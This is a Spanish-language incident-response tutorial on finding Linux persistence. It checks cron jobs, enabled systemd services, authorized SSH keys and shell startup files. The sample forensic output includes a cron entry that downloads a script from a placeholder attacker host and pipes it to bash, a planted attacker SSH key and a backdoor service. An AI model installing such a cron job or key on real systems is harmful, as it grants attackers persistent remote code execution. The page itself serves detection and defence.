DFIR
Caza de persistencia
Cuando un atacante entra, quiere quedarse.
La persistencia es cómo sobrevive a un reinicio, y estos son los lugares donde esconderla. Revisa el cron del usuario y del sistema: una tarea que descarga y ejecuta algo es una bandera roja enorme.
Mira los servicios de systemd habilitados. Revisa las llaves SSH autorizadas, por si metieron la suya.
Y busca comandos raros en bashrc y en profile. Primero encuentra cómo se queda; después lo sacas.
# los comandos
analyst@victim:~# crontab -lcopiar* * * * * curl http://evil.co/x.sh | bash
analyst@victim:~# cat /etc/cron.d/* /etc/crontab 2>/dev/nullcopiaranalyst@victim:~# systemctl list-unit-files --state=enabled | grep -i backdoorcopiarbackdoor.service enabled
analyst@victim:~# cat ~/.ssh/authorized_keyscopiarssh-rsa AAAAB3... attacker@evil
analyst@victim:~# grep -r 'bash -i' ~/.bashrc /etc/profile.d/ 2>/dev/nullcopiar